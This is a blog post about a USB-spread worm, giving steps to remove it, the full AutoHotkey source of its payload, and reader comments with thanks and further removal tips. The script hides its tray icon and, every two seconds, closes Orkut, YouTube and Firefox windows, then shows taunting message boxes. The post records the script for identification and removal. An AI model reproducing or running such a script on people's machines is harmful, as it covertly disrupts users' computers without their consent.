I picked up a worm while using the pen drive at the college. It is a rather unique one as it says
ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??
when you try to open orkut.
youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did
when you try to open youtube
and most intrestingly does not allow you to use firefox. However, it is easy to remove. Just go to the task manager by pressing ctrl+alt+del keys together.
remove all processes that have the name "SVCHOST.exe" and are running under your user name. Dont remove the other SVCHOST.exe processes such as the local service, system etc..
after that goto
C:\heap41a
select all the contents of that folder and delete it and you worm is gone. This seems a preliminary worm which may later become dangerous. Anyway for the sake of record i am putting up the script i found in it.
And one more thing it makes that wonderful noise which is supposed to be a laugh!! If you find any variants pls let me know..
#persistent
#notrayicon
settimer,ban,2000
return
ban:
WinGetActiveTitle, ed
ifinstring,ed,orkut
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,youtube
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,Mozilla Firefox
{
winclose %ed%
msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA BUT USE IE `r OR ELSE...,30
return
}
ifwinactive ahk_class IEFrame
{
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
}
return
8 comments:
It still seems to be a problem. I can work temporarily after following the steps. But once when i restart my computer, the problem starts again. Is it possible to remove that file altogether from whatever place its in???
You can remove the files which are at
C:\heap41a
folder. That should remove the worm permanently.The worm will not come even after restart.
Make sure you have a good antivirus and scan your pen drive before use.The worm can come back easily.
try this also
Remove-Worm.html
nagarjun... thanks a lot for your suggestion... i picked up this worm from some site i feel. i used pen drive also from last one week. now my system has this problem.. i wil try to fix it as u said.
thanks a lot.
this procedure doesnt work anymore...Another way of removing this worm ( BTW i found this out while going through the source code, what a dumb mother-f#@!er the creator must be :) ) is by searching for a file called 2.mp3 and deleting the entire source folder i.e. the folder containing this file.Lemme know if it works...Cheers! vivekvivek2001@rediffmail.com
thanks a lot buddy it helped...alot..
god bless u
thanks a ton buddy for ur help.........good job ..thanks a lot
thanks a lot..it fixed my problem!!
Post a Comment